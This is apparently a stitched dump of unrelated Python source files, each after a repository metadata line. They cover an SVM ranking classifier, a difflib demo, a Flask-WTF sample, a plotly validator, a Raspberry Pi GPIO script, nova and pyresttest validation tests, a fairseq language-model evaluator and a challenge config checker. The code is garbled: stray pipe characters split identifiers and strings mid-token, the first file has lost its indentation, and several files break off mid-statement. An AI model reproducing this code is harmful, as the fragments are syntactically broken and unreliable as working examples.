from dtbutils import *
from perceptron import KernelLBRankPerceptron, polynomial_kernel
import numpy as np
import cPickle
class Classifier(object):
def __init__(self, param={'model':'', 'pref':'def', 'verbose':False,\
'classtype':'classifier'}):
self._param = param
# Model
self._classtype = param['classtype']
self._modelname = param['model']
self._pref = param['pref']
self._model = None
self._numex_train = 0
self._numex_dev = 0
self._max_feat = 0
self._labs = {}
self._svmclassp = "-s 0 -t 1 -d 3 -g 0.1 -r 0.0 -e 1.0 -c 1.0 -q"
self._svmstrucp = "-z p -t 1 -d 3 -s 0.1 -r 0.0 -e 1.0 -c 0.05 -b 0"
#
# Make a decision using a model on an example, A feature vector is:
# ((feat1,val1), (feat3,val3), ...)
# Where each index corresponds to a feature in the model alphabet. Output
# a list of tuples (class/idx, score) sorted by decending score.
#
def score(self, feats):
m = self._model
if self._classtype == "classifier":
x,_ = svm.gen_svm_nodearray(dict(feats))
return int(svm.libsvm.svm_predict(m, x))
elif self._classtype == "structured":
maxscore = -sys.maxint
maxidx = None
for idx in range(len(feats)):
dec_val = svmlight.classify(m, [(0, feats[idx])])
if dec_val > maxscore:
maxscore = dec_val
maxidx = idx
return maxidx
elif self._classtype == "percrank":
X = [None]*len(feats)
Xisd = [0]*len(feats)
Xisd[0] = 1
for idx in range(len(feats)):
X[idx] = set([f for f,v in feats[idx]])
dec_vals = m.project(X, Xisd)
return dec_vals.index(max(dec_vals))
#
# Reads a ranking problem.
#
def read_rank_problem(self, ef):
efile = codecs.open(ef, 'r', 'ascii')
qid = None
allex = []
rex = []
print >> sys.stderr, "Reading ranking problem..."
for line in efile:
fields = line.rstrip().split(' ')
glab = int(fields.pop(0))
cqid = int(fields.pop(0).split(":")[1])
feats = []
for field in fields:
f,v = field.split(":")
#feats.append((int(f),float(v)))
feats.append(int(f))
feats = set(feats)
if qid == None:
qid = cqid
rex = [(glab, feats)]
elif qid == cqid:
rex.append((glab, feats))
else:
allex.append(rex)
qid = cqid
rex = [(glab, feats)]
allex.append(rex)
efile.close()
# Only supports a one-vs-all ranking (highest glab over rest)
print >> sys.stderr, "Generating ranking constraints...",
X1 = []
X2 = []
X2cnt = 0
Xidx = []
X1isdef = []
X2isdef = []
bline = 0
for rex in allex:
glabs = [glab for glab,_ in rex]
gidx = glabs.index(max(glabs))
cidx = []
for i in range(len(rex)):
glab,feats = rex[i]
if i == 0 and glab == 1:
bline += 1
if i == gidx:
X1.append(feats)
if i == 0:
X1isdef.append(1)
else:
X1isdef.append(0)
else:
cidx.append(X2cnt)
X2.append(feats)
if i == 0:
X2isdef.append(1)
else:
X2isdef.append(0)
X2cnt += 1
Xidx.append(tuple(cidx))
print >> sys.stderr, X2cnt
return X1, X1isdef, X2, X2isdef, Xidx, bline
#
# Append stream of examples to file. Feature vectors are as follows:
# [(feat1, val1), (feat3, val3), ..., (featn, valn)]
#
def write_examples(self, examples, mode="train"):
exstream = codecs.open(self._modelname+"/"+self._pref+"."+mode,\
'a', 'ascii')
# Classification examples over a single line. Label and feature vector:
# 2 0:1 2:1 5:1
# 5 1:1 2:1 4:1
if self._classtype == "classifier":
for glab,feats in examples:
if mode == 'train':
self._numex_train += 1
self._max_feat = max(self._max_feat, feats[-1][0])
self._labs[glab] = True
else:
self._numex_dev += 1
print >> exstream, glab, \
" ".join([str(f)+":"+str(v) for f,v in feats])
# Structured binary examples.
# 1 qid:1 1:1 2:-1 5:-1
# 0 qid:1 1:-1 2:1 4:-1
elif self._classtype in ["structured", "percrank"]:
for idxg,ex in examples:
if mode == 'train':
| self._numex_train += 1
qid = self._numex_train
else:
self._numex_dev += 1
qid = self._numex_dev
for idx in range(len(ex)):
feats = ex[idx]
| if mode == 'train':
self._max_feat = max(self._max_feat, feats[-1][0])
if idxg == idx:
glab = 1
else:
glab = 0
print >> exstream, glab, 'qid:'+str(qid),\
" ".join([str(f)+":"+str(v) \
for f,v in feats])
exstream.close()
#
# Train model.
#
def train_model(self):
if self._classtype in ["structured", "percrank"]:
self._labs = {1:True}
print >> sys.stderr, "Training model with",\
self._numex_train,"examples,", self._max_feat+1, "features and",\
len(self._labs), "labels."
if self._numex_dev:
print >> sys.stderr, "Also with", self._numex_dev,"dev examples."
ef = self._modelname+"/"+self._pref+".train"
df = self._modelname+"/"+self._pref+".dev"
mf = self._modelname+"/"+self._pref+".model"
if self._classtype == "classifier":
os.system("$LIBSVM/svm-train "+self._svmclassp+" "+ef+" "+mf)
elif self._classtype == "structured":
os.system("$SVMLIGHT/svm_learn "+self._svmstrucp+" "+ef+" "+mf)
elif self._classtype == "percrank":
X1,X1isdef,X2,X2isdef,Xidx,bline = self.read_rank_problem(ef)
X1dev,X1devisdef,X2dev,X2devisdef,Xdevidx,devbline = \
self.read_rank_problem(df)
m = KernelLBRankPerceptron(kernel=polynomial_kernel, T=10, B=0)
m.fit(X1, X1isdef, X2, X2isdef, Xidx, X1dev, X1devisdef, X2dev,\
X2devisdef, Xdevidx, gm=False, bl=devbline)
mfile = open(mf, 'wb')
cPickle.dump([m.sv_a,m.sv_1,m.sv_2,m.bias], mfile, -1)
mfile.close()
#
# Load model.
#
def load_model(self):
if not os.path.isfile(self._modelname+"/"+self._pref+".model"):
return False
if self._classtype == "classifier":
self._model = svmutil.svm_load_model(self._modelname+\
"/"+self._pref+".model")
elif self._classtype == "structured":
self._model = svmlight.read_model(self._modelname+\
|
jasonwee/asus-rt-n14uhp-mrtg | src/lesson_text/difflib_seq.py | Python | apache-2.0 | 948 | 0.006329 | import difflib
s1 = [1, 2, 3, 5, 6, 4]
s2 = [2, 3, 5, 4, 6, 1]
print('Initial data:')
print('s1 =', s1)
print('s2 =', s2)
print('s1 == s2:', s1 == s2)
print()
matcher = difflib.SequenceMatcher(None, s1, s2)
for tag, i1, i2, j1, j2 in reversed(matcher.get_opcodes()):
if tag == 'delete':
print('Remove {} from positions [{}:{}]'.format(s1[i1:i2], i1, i2))
print(' before =', s1)
del s1[i1:i2]
elif tag == 'equal':
print('s1[{}:{}] and s2[{}:{}] are the same'.format(i1, i2, j1, j2))
elif tag == 'insert':
print('Insert {} from s2[{}:{}] into s1 at {}'.format(s2[j1:j2], j1, j2, i1))
print(' before =', s1)
s1[i1:i2] = s2[j1:j2]
elif tag == 'replace': |
print(('Replace {} from s1[{}:{}] '
'with {} from s2[{}:{}]').format(
s1[i1:i2], | i1, i2, s2[j1:j2], j1, j2))
print(' before =', s1)
s1[i1:i2] = s2[j1:j2]
print(' after = ', s1, '\n')
print('s1 == s2:', s1 == s2)
|
lightningwolf/Flask-JqueryUiBootstrap | SAMPLE_PROJECT/wtf-app.py | Python | mit | 1,192 | 0.003356 | #!/usr/bin/env python
# coding=utf8
from flask import Flask, render_template
from flask.ext.jqueryuibootstrap import JqueryUiBootstrap
from flask.ext.wtf import (
Form,
RecaptchaField,
)
from wtforms import (
TextField,
HiddenField,
ValidationError,
)
from wtforms.validators import (
Required,
)
app = Flask(__name__)
JqueryUiBootstrap(app)
app.config['SECRET_KEY'] = 'devkey'
app.config['RECAPTCHA_PUBLIC_KEY'] = '6Lfol9cSAAAAADAkodaYl9wvQCwBMr3qGR_PPHcw'
class ExampleForm(Form):
field1 = TextField('First Field', description= | 'This is field one.')
field2 = TextField('Second Field', description='This is field two.',
validators=[Required()])
hidden_field = HiddenField('You cannot see this', description='Nope')
recaptcha = RecaptchaField('A sample recaptcha field')
def validate_hidden_field(form, field):
raise ValidationError('Always wrong')
@app.route('/', methods=('GET', 'POST',))
def index():
form = ExampleForm()
if form.validate_on_submit():
return "PAS | SED"
return render_template('example.html', form=form)
if '__main__' == __name__:
app.run(debug=True)
|
Spinmob/spinmob | _plot_complex.py | Python | gpl-3.0 | 207 | 0.024155 | from . import _plotting_mess
data = _plot | ting_mess.complex_data
databoxes = _plotting_mess.complex_databoxes
files = _plotting_mess.complex_ | files
function = _plotting_mess.complex_function |
plotly/python-api | packages/python/plotly/plotly/validators/layout/title/_pad.py | Python | mit | 945 | 0.001058 | import _plotly_utils.basevalidators
class PadValidator(_plotly_utils.basevalidators.CompoundValidator):
def __init__(self, plotly_name="pad", parent_name="layout.title", **kwargs):
super(PadValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
data_class_str=kwargs.pop("data_class_str", "Pad"),
data_docs=kwargs.pop(
"data_docs",
"""
b
The amount of padding (in px) along the bottom
of the component.
l
The amount of padding (in px) on the left side
of the component.
| r
The amount of padding (in px) on the right side
of the component.
t
The amount of padding (in px) alo | ng the top of
the component.
""",
),
**kwargs
)
|
meigrafd/Sample-Code | interrupt_pause_script.py | Python | mit | 1,638 | 0.0116 | #!/usr/bin/python
from __future__ import print_function
import RPi.GPIO as GPIO
import time
import Queue # https://pymotw.com/2/Queue/
#GPIO pins
Taster1 = 24
Taster2 = 27
# GPIO-Nummer als Pinreferenz waehlen
GPIO.setmode(GPIO.BCM)
# GPIO vom SoC als Input deklarieren und Pull-Down Widerstand aktivieren
#PULL = GPIO.PUD_DOWN #GPIO -> GND
PULL = GPIO.PUD_UP #GPIO -> 3V3
GPIO.setup(Taster1, GPIO.IN, pull_up_down=PULL)
GPIO.setup(Taster2, GPIO.IN, pull_up_down=PULL)
# Dictionary definieren. http://www.tutorialspoint.com/python/python_dictionary.htm
dictionary = {}
dictionary['pause'] = False
queue = Queue.Queue()
# Script pausieren/blockieren/beschaeftigen
def Pause():
while dictionary['pause'] == True:
time.sleep(1)
# ISR
def interrupt_event(pin):
if pin == Taster1:
queue.put(pin)
if pin == Taster2:
print("Führe Script weiter aus")
dictionary['pause'] = False
try:
# Interrupt Event hinzufuegen. Auf steigende Flanke reagieren un | d ISR "Interrupt" deklarieren sowie Pin entprellen
GPIO.add_event_detect(Taster1, GPIO.RISING, callback=interrupt_event, bouncetime=200)
GPIO.add_event_detect(Taster2, GPIO.RISING, callback=interrupt_event, bouncetime=200)
# keep script running
while True:
time.sleep(0.5)
if not queue.empty():
job = queue.get()
if job == Taster1:
prin | t("Pausiere Script")
dictionary['pause'] = True
Pause()
print("...puh... Im super heavy busy...")
except (KeyboardInterrupt, SystemExit):
GPIO.cleanup()
print("\nQuit\n") |
rahulunair/nova | nova/tests/unit/test_api_validation.py | Python | apache-2.0 | 47,979 | 0.000333 | # Copyright 2013 NEC Corporation. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
import re
import fixtures
from jsonschema import exceptions as jsonschema_exc
import six
from nova.api.openstack import api_version_request as api_version
from nova.api import validation
from nova.api.validation import parameter_types
from nova.api.validation import validators
from nova import exception
from nova import test
from nova.tests.unit.api.openstack import fakes
query_schema = {
'type': 'object',
'properties': {
'foo': parameter_types.single_param({'type': 'string',
'format': 'uuid'}),
'foos': parameter_types.multi_params({'type': 'string'})
},
'patternProperties': {
"^_": parameter_types.multi_params({'type': 'string'})},
'additionalProperties': True
}
class FakeQueryParametersController(object):
@validation.query_schema(query_schema, '2.3')
def get(self, req):
return list(set(req.GET.keys()))
class RegexFormatFakeController(object):
schema = {
'type': 'object',
'properties': {
'foo': {
'format': 'regex',
},
},
}
@validation.schema(request_body_schema=schema)
def post(self, req, body):
return 'Validation succeeded.'
class FakeRequest(object):
api_version_request = api_version.APIVersionRequest("2.1")
environ = {}
legacy_v2 = False
def is_legacy_v2(self):
return self.legacy_v2
class ValidationRegex(test.NoDBTestCase):
def test_build_regex_range(self):
# this is much easier to think about if we only use the ascii
# subset because it's a printable range we can think
# about. The algorithm works for all ranges.
def _get_all_chars():
for i in range(0x7F):
yield six.unichr(i)
self.useFixture(fixtures.MonkeyPatch(
'nova.api.validation.parameter_types._get_all_chars',
_get_all_chars))
# note that since we use only the ascii range in the tests
# we have to clear the cache to recompute them.
parameter_types._reset_cache()
r = parameter_types._build_regex_range(ws=False)
self.assertEqual(r, re.escape('!') + '-' + re.escape('~'))
# if we allow whitespace the range starts earlier
r = parameter_types._build_regex_range(ws=True)
self.assertEqual(r, re.escape(' ') + '-' + re.escape('~'))
# excluding a character will give us 2 ranges
r = parameter_types._build_regex_range(ws=True, exclude=['A'])
self.assertEqual(r,
re.escape(' ') + '-' + re.escape('@') +
'B' + '-' + re.escape('~'))
# inverting which gives us all the initial unprintable characters.
r = parameter_types._build_regex_range(ws=False, invert=True)
self.assertEqual(r,
re.escape('\x00') + '-' + re.escape(' '))
# excluding characters that create a singleton. Naively this would be:
# ' -@B-BD-~' which seems to work, but ' -@BD-~' is more natural.
r = parameter_types._build_regex_range(ws=True, exclude=['A', 'C'])
self.assertEqual(r,
re.escape(' ') + '-' + re.escape('@') +
'B' + 'D' + '-' + re.escape('~'))
# ws=True means the positive regex has printable whitespaces,
# so the inverse will not. The inverse will include things we
# exclude.
r = parameter_types._build_regex_range(
ws=True, exclude=['A', 'B', 'C', 'Z'], invert=True)
self.assertEqual(r,
re.escape('\x00') + '-' + re.escape('\x1f') + 'A-CZ')
class APIValidationTestCase(test.NoDBTestCase):
post_schema = None
def setUp(self):
super(APIValidationTestCase, self).setUp()
self.post = None
if sel | f.post_schema is not None:
@validation.schema(request_body_schema=self.post_schema)
def post(req, body):
return 'Validation succeeded.'
self.post = post
def check_validation_error(self, method, body, expected_detail, req=None):
if not req:
req = FakeRequest()
try:
method(body=body, req | =req)
except exception.ValidationError as ex:
self.assertEqual(400, ex.kwargs['code'])
if isinstance(expected_detail, list):
self.assertIn(ex.kwargs['detail'], expected_detail,
'Exception details did not match expected')
elif not re.match(expected_detail, ex.kwargs['detail']):
self.assertEqual(expected_detail, ex.kwargs['detail'],
'Exception details did not match expected')
except Exception as ex:
self.fail('An unexpected exception happens: %s' % ex)
else:
self.fail('Any exception does not happen.')
class FormatCheckerTestCase(test.NoDBTestCase):
def _format_checker(self, format, value, error_message):
format_checker = validators.FormatChecker()
exc = self.assertRaises(jsonschema_exc.FormatError,
format_checker.check, value, format)
self.assertIsInstance(exc.cause, exception.InvalidName)
self.assertEqual(error_message,
exc.cause.format_message())
def test_format_checker_failed_with_non_string_name(self):
error_message = ("An invalid 'name' value was provided. The name must "
"be: printable characters. "
"Can not start or end with whitespace.")
self._format_checker("name", " ", error_message)
self._format_checker("name", None, error_message)
def test_format_checker_failed_name_with_leading_trailing_spaces(self):
error_message = ("An invalid 'name' value was provided. "
"The name must be: printable characters with at "
"least one non space character")
self._format_checker("name_with_leading_trailing_spaces",
None, error_message)
class MicroversionsSchemaTestCase(APIValidationTestCase):
def setUp(self):
super(MicroversionsSchemaTestCase, self).setUp()
schema_v21_int = {
'type': 'object',
'properties': {
'foo': {
'type': 'integer',
}
}
}
schema_v20_str = copy.deepcopy(schema_v21_int)
schema_v20_str['properties']['foo'] = {'type': 'string'}
@validation.schema(schema_v20_str, '2.0', '2.0')
@validation.schema(schema_v21_int, '2.1')
def post(req, body):
return 'Validation succeeded.'
self.post = post
def test_validate_v2compatible_request(self):
req = FakeRequest()
req.legacy_v2 = True
self.assertEqual(self.post(body={'foo': 'bar'}, req=req),
'Validation succeeded.')
detail = ("Invalid input for field/attribute foo. Value: 1. "
"1 is not of type 'string'")
self.check_validation_error(self.post, body={'foo': 1},
expected_detail=detail, req=req)
def test_validate_v21_request(self):
req = FakeRequest()
self.assertEqual(self.post(body={'foo': 1}, req=req),
'Validation succeeded.')
detail = ("Invalid input for field/attribute foo. Va |
hfp/libxsmm | samples/deeplearning/sparse_training/fairseq/fairseq_cli/eval_lm.py | Python | bsd-3-clause | 8,725 | 0.001375 | #!/usr/bin/env python3 -u
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
"""
Evaluate the perplexity of a trained language model.
"""
import logging
import math
import os
import torch
from fairseq import checkpoint_utils, options, tasks, utils
from fairseq.data import LMContextWindowDataset
from fairseq.logging import progress_bar
from fairseq.logging.meters import StopwatchMeter, TimeMeter
from fairseq.sequence_scorer import SequenceScorer
from fairseq import distributed_utils
logging.basicConfig(
format='%(asctime)s | %(levelname)s | %(name)s | %(message)s',
datefmt='%Y-%m-%d %H:%M:%S',
level=logging.INFO,
)
logger = logging.getLogger('fairseq_cli.eval_lm')
class WordStat(object):
def __init__(self, word, is_bpe):
self.word = word
self.is_bpe = is_bpe
self.log_prob = 0
self.next_word_prob = 0
self.count = 0
self.missing_next_words = 0
def add(self, log_prob, next_word_prob):
""" increments counters for the sum of log probs of current word and next
word (given context ending at current word). Since the next word might be at the end of the example,
or it might be not counted because it is not an ending subword unit,
also keeps track of how many of those we have seen """
if next_word_prob is not None:
self.next_word_prob += next_word_prob
else:
self.missing_next_words += 1
self.log_prob += log_prob
self.count += 1
def __str__(self):
return '{}\t{}\t{}\t{}\t{}\t{}'.format(self.word, self.count, self.log_prob, self.is_bpe,
self.next_word_prob, self.count - self.missing_next_words)
def main(parsed_args, **unused_kwargs):
assert parsed_args.path is not None, '--path required for evaluation!'
if torch.cuda.is_available() and not parsed_args.cpu:
torch.cuda.set_device(parsed_args.device_id)
utils.import_user_module(parsed_args)
logger.info(parsed_args)
use_cuda = torch.cuda.is_available() and not parsed_args.cpu
task = tasks.setup_task(parsed_args)
# Load ensemble
logger.info('loading model(s) from {}'.format(parsed_args.path))
models, args = checkpoint_utils.load_model_ensemble(
parsed_args.path.split(os.pathsep),
arg_overrides=eval(parsed_args.model_overrides),
task=task,
suffix=getattr(parsed_args, "checkpoint_suffix", ""),
)
for arg in vars(parsed_args).keys():
if arg not in {
'self_target', 'future_target', 'past_target', 'tokens_per_sample',
'output_size_dictionary', 'add_bos_token',
}:
setattr(args, arg, getattr(parsed_args, arg))
# reduce tokens per sample by the required context window size
args.tokens_per_sample -= args.context_window
task = tasks.setup_task(args)
# Load dataset splits
task.load_dataset(args.gen_subset)
dataset = task.dataset(args.gen_subset)
if args.context_windo | w > 0:
dataset = LMContextWindowDataset(
dataset=dataset,
tokens_per_sample=args.tokens_per_sample,
context_window=args.context_window,
pad_idx=tas | k.source_dictionary.pad(),
)
logger.info('{} {} {} examples'.format(args.data, args.gen_subset, len(dataset)))
# Optimize ensemble for generation and set the source and dest dicts on the model (required by scorer)
for model in models:
model.prepare_for_inference_(args)
if args.fp16:
model.half()
if use_cuda:
model.cuda()
assert len(models) > 0
logger.info('num. model params: {}'.format(sum(p.numel() for p in models[0].parameters())))
itr = task.get_batch_iterator(
dataset=dataset,
max_tokens=args.max_tokens or 36000,
max_sentences=args.max_sentences,
max_positions=utils.resolve_max_positions(*[
model.max_positions() for model in models
]),
ignore_invalid_inputs=True,
num_shards=args.num_shards,
shard_id=args.shard_id,
num_workers=args.num_workers,
).next_epoch_itr(shuffle=False)
progress = progress_bar.progress_bar(
itr,
log_format=args.log_format,
log_interval=args.log_interval,
default_log_format=('tqdm' if not args.no_progress_bar else 'none'),
)
gen_timer = StopwatchMeter()
scorer = SequenceScorer(task.target_dictionary, args.softmax_batch)
score_sum = 0.
count = 0
if args.remove_bpe is not None:
if args.remove_bpe == 'sentencepiece':
raise NotImplementedError
else:
bpe_cont = args.remove_bpe.rstrip()
bpe_toks = {
i
for i in range(len(task.source_dictionary))
if task.source_dictionary[i].endswith(bpe_cont)
}
bpe_len = len(bpe_cont)
else:
bpe_toks = None
bpe_len = 0
word_stats = dict()
wps_meter = TimeMeter()
for sample in progress:
if 'net_input' not in sample:
continue
sample = utils.move_to_cuda(sample) if use_cuda else sample
gen_timer.start()
hypos = scorer.generate(models, sample)
gen_timer.stop(sample['ntokens'])
for i, hypos_i in enumerate(hypos):
hypo = hypos_i[0]
sample_id = sample['id'][i]
tokens = hypo['tokens']
tgt_len = tokens.numel()
pos_scores = hypo['positional_scores'].float()
if args.add_bos_token:
assert hypo['tokens'][0].item() == task.target_dictionary.bos()
tokens = tokens[1:]
pos_scores = pos_scores[1:]
skipped_toks = 0
if bpe_toks is not None:
for i in range(tgt_len - 1):
if tokens[i].item() in bpe_toks:
skipped_toks += 1
pos_scores[i + 1] += pos_scores[i]
pos_scores[i] = 0
inf_scores = pos_scores.eq(float('inf')) | pos_scores.eq(float('-inf'))
if inf_scores.any():
logger.info(
'skipping tokens with inf scores:',
task.target_dictionary.string(tokens[inf_scores.nonzero()])
)
pos_scores = pos_scores[(~inf_scores).nonzero()]
score_sum += pos_scores.sum().cpu()
count += pos_scores.numel() - skipped_toks
if args.output_word_probs or args.output_word_stats:
w = ''
word_prob = []
is_bpe = False
for i in range(len(tokens)):
w_ind = tokens[i].item()
w += task.source_dictionary[w_ind]
if bpe_toks is not None and w_ind in bpe_toks:
w = w[:-bpe_len]
is_bpe = True
else:
word_prob.append((w, pos_scores[i].item()))
next_prob = None
ind = i + 1
while ind < len(tokens):
if pos_scores[ind].item() != 0:
next_prob = pos_scores[ind]
break
ind += 1
word_stats.setdefault(w, WordStat(w, is_bpe)).add(pos_scores[i].item(), next_prob)
is_bpe = False
w = ''
if args.output_word_probs:
logger.info(
str(int(sample_id)) + " "
+ ('\t'.join('{} [{:2f}]'.format(x[0], x[1]) for x in word_prob))
)
wps_meter.update(sample['ntokens'])
progress.log({'wps': round(wps_meter.avg)})
avg_nll_loss = -score_sum / count / math.log(2) # convert to base 2
logger.info('Evaluated {} tokens in {:.1 |
holdenweb/pyresttest | pyresttest/test_validators.py | Python | apache-2.0 | 13,922 | 0.001796 | import unittest
import validators
from binding import Context
class ValidatorsTest(unittest.TestCase):
""" Testing for validators and extract functions """
def test_validatortest_exists(self):
func = validators.VALIDATOR_TESTS['exists']
self.assertTrue(func('blah'))
self.assertTrue(func(0))
self.assertTrue(func('False'))
self.assertTrue(func(False))
self.assertFalse(func(None))
def test_validatortest_not_exists(self):
func = validators.VALIDATOR_TESTS['not_exists']
self.assertFalse(func('blah'))
self.assertFalse(func(0))
self.assertFalse(func('False'))
self.assertTrue(func(None))
def test_dict_query(self):
""" Test actual query logic """
mydict = {'key': {'val': 3}}
query = 'key.val'
val = validators.MiniJsonExtractor.query_dictionary(query, mydict)
self.assertEqual(3, val)
array = [1,2,3]
mydict = {'key': {'val': array}}
val = validators.MiniJsonExtractor.query_dictionary(query, mydict)
self.assertEqual(array, val)
mydict = {'key': {'v': 'pi'}}
val = validators.MiniJsonExtractor.query_dictionary(query, mydict)
self.assertEqual(None, val)
# Array test
query = 'key.val.1'
mydict = {'key': {'val': array}}
val = validators.MiniJsonExtractor.query_dictionary(query, mydict)
self.assertEqual(array[1], val)
# Error cases
query = 'key.val.5'
mydict = {'key': {'val': array}}
val = validators.MiniJsonExtractor.query_dictionary(query, mydict)
self.assertEqual(None, val)
query = 'key.val.pi'
mydict = {'key': {'val': array}}
val = validators.MiniJsonExtractor.query_dictionary(query, mydict)
self.assertEqual(None, val)
# Return the first object?
query = 'key.0'
mydict = {'key': {'val': array}}
val = validators.MiniJsonExtractor.query_dictionary(query, mydict)
self.assertEqual(None, val)
# Mix array array and dictionary
mydict = [{'key': 'val'}]
query = '0.key'
val = validators.MiniJsonExtractor.query_dictionary(query, mydict)
self.assertEqual('val', val)
def test_parse_extractor_minijson(self):
config = 'key.val'
extractor = validators.MiniJsonExtractor.parse(config)
myjson = '{"key": {"val": 3}}'
context = Context()
context.bind_variable('node', 'val')
extracted = extractor.extract(body=myjson)
self.assertEqual(3, extracted)
self.assertEqual(extracted, extractor.extract(body=myjson, context=context))
try:
val = extractor.extract(body='[31{]')
self.fail("Should throw exception on invalid JSON")
except ValueError:
pass
# Templating
config = {'template': 'key.$node'}
extract = validators.MiniJsonExtractor.parse(config)
self.assertEqual(3, extract.extract(myjson, context=context))
def test_header_extractor(self):
query = 'content-type'
extractor = validators.HeaderExtractor.parse(query)
headers = {'content-type': 'application/json'}
extracted = extractor.extract(body='blahblah', headers=headers)
self.assertEqual(headers[query], extracted)
# Test case-insensitivity
query = 'content-Type'
extractor = validators.HeaderExtractor.parse(query)
extracted = extractor.extract(body='blahblah', headers=headers)
self.assertEqual(headers[query.lower()], extracted)
headers = {'foo': 'bar'}
extracted = extractor.extract(body='blahblah', headers=headers)
self.assertEqual(None, extracted)
def test_parse_header_extractor(self):
query = 'content-type'
extractor = validators.parse_extractor('header', query)
self.assertTrue(isinstance(extractor, validators.HeaderExtractor))
self.assertTrue(extractor.is_header_extractor)
self.assertFalse(extractor.is_body_extractor)
def test_abstract_extractor_parse(self):
""" Test parsing a basic abstract extractor """
ext = validators.AbstractExtractor()
ext = validators.AbstractExtractor.configure_base('val', ext)
self.assertEqual('val', ext.query)
self.assertEqual(False, ext.is_templated)
validators.AbstractExtractor.configure_base({'template': '$var'}, ext)
self.assertEqual(True, ext.is_templated)
self.assertEqual('$var', ext.query)
def test_abstract_extractor_string(self):
""" Test abstract extractor to_string method """
ext = validators.AbstractExtractor()
ext.is_templated = True
ext.is_header_extractor = True
ext.is_body_extractor = True
ext.query = 'gooblyglah'
ext.extractor_type = 'bleh'
ext.args = {'cheesy': 'poofs'}
expected = "Extractor type: {0}, query: {1}, is_templated: {2}, args: {3}".format(ext.extractor_type, ext.query, ext.is_templated, ext.args)
self.assertEqual(expected, str(ext))
def test_abstract_extractor_templating(self):
""" Test that abstract extractors template the query """
ext = valid | ators.AbstractE | xtractor()
ext.query = '$val.vee'
ext.is_templated = True
context = Context()
context.bind_variable('val', 'foo')
self.assertEqual('$val.vee', ext.templated_query())
self.assertEqual('foo.vee', ext.templated_query(context=context))
ext.is_templated = False
self.assertEqual('$val.vee', ext.templated_query(context=context))
def test_abstract_extractor_readableconfig(self):
""" Test human-readable extractor config string output """
config = 'key.val'
extractor = validators.parse_extractor('jsonpath_mini', config)
expected_string = 'Extractor Type: jsonpath_mini, Query: "key.val", Templated?: False'
self.assertEqual(expected_string, extractor.get_readable_config())
# Check empty context & args uses okay
context = Context()
self.assertEqual(expected_string, extractor.get_readable_config(context=context))
context.bind_variable('foo', 'bar')
self.assertEqual(expected_string, extractor.get_readable_config(context=context))
extractor.args = dict()
self.assertEqual(expected_string, extractor.get_readable_config(context=context))
# Check args output is handled correctly
extractor.args = {'caseSensitive': True}
self.assertEqual(expected_string+", Args: "+str(extractor.args), extractor.get_readable_config(context=context))
# Check template handling is okay
config = {'template': 'key.$templated'}
context.bind_variable('templated', 'val')
extractor = validators.parse_extractor('jsonpath_mini', config)
expected_string = 'Extractor Type: jsonpath_mini, Query: "key.val", Templated?: True'
self.assertEqual(expected_string, extractor.get_readable_config(context=context))
def test_parse_extractor(self):
""" Test parsing an extractor using the registry """
config = 'key.val'
myjson = '{"key": {"val": 3}}'
extractor = validators.parse_extractor('jsonpath_mini', config)
self.assertTrue(isinstance(extractor, validators.AbstractExtractor))
self.assertEqual(3, extractor.extract(body=myjson))
def test_get_extractor(self):
config = {
'jsonpath_mini': 'key.val',
'comparator': 'eq',
'expected': 3
}
extractor = validators._get_extractor(config)
myjson = '{"key": {"val": 3}}'
extracted = extractor.extract(body=myjson)
self.assertEqual(3, extracted)
def test_parse_validator(self):
""" Test basic parsing using registry """
config = {
'jsonpath_mini': 'key.val',
'comparator': 'eq',
'expected': 3
}
validator = validators.parse_validator('comparator', config)
myjson = '{"key": {"val": 3}}'
comp = val |
avatao-content/challenge-toolbox | toolbox/utils/config.py | Python | apache-2.0 | 4,202 | 0.002142 | import os
import re
import yaml
try:
from packaging.version import parse as parse_version
except ImportError:
from pkg_resources import parse_version
from toolbox.config.common import BUTTON_CONFIG_KEYS, CRP_TYPES, CURRENT_MAX_VERSION, CURRENT_MIN_VERSION, PROTOCOLS
from .utils import counted_error, fatal_error
def compare_version(config: dict, min_version: str, max_version: str):
version = parse_version(config['version'])
if version < parse_version(min_version):
return -1
if version > parse_version(max_version):
return 1
return 0
def validate_version(config: dict):
cmp = compare_version(config, CURRENT_MIN_VERSION, CURRENT_MAX_VERSION)
if cmp < 0:
fatal_error('Please, upgrade to version %s with upgrade.py!', CURRENT_MIN_VERSION)
if cmp > 0:
fatal_error('Please, use a newer toolbox for version %s!', config['version'])
def get_crp_type(config: dict) -> str:
crp_type = config.get('crp_type') or 'static'
if crp_type not in CRP_TYPES:
fatal_error("Unknown crp_type: '%s' / %s", crp_type, CRP_TYPES)
return crp_type
def read_config(path: str, *, pre_validate: bool = True) -> dict:
"""
Read the config.yml file
:param path: path to the file or the base directory
:param pre_validate: check version and crp_type fields
:return: dict
"""
if os.path.isdir(path):
path = os.path.join(path, 'config.yml')
try:
with open(path, 'r') as f:
config = yaml.safe_load(f)
if pre_validate:
validate_version(config)
get_crp_type(config)
return config
except Exception as e:
fatal_error('%s(%s)', type(e).__name__, e)
def parse_bool(value) -> bool:
return str(value).lower() in ('true', '1')
def validate_bool(key, value):
if str(value).lower() not in ('true', 'false', '1', '0'):
counted_error('Invalid %s value. It must be boolean.', key)
def validate_flag(config: dict, flag_required: bool = False):
validate_bool('enable_flag_input', config.get('enable_flag_input'))
if config.get('flag'):
try:
if config['flag'][0:6] == 'regex:':
re.compile(config['flag'][6:])
except TypeError:
counted_error('Invalid flag value. It must be string.')
except Exception:
counted_error('Failed to compile regex flag.')
if not parse_bool(config.get('enable_flag_input')):
counted_error('enable_flag_input must be true for static flags.')
elif flag_required:
counted_error('A static (or regex) flag must be set.')
def validate_ports(ports: list, buttons: dict = None): | # pylint: disable=too-many-branches
unique_ports = set()
ssh_ports_count = 0
for port in ports:
try:
port, protocol = port.split('/', 1)
unique_ports.add(port)
try:
if not 0 < int(port) < 65536:
raise ValueError
except Exception:
counted_error('Invalid port number: %s. Ports must be numbers between 1 and 65535.', port)
if protocol not in PROTOCOLS:
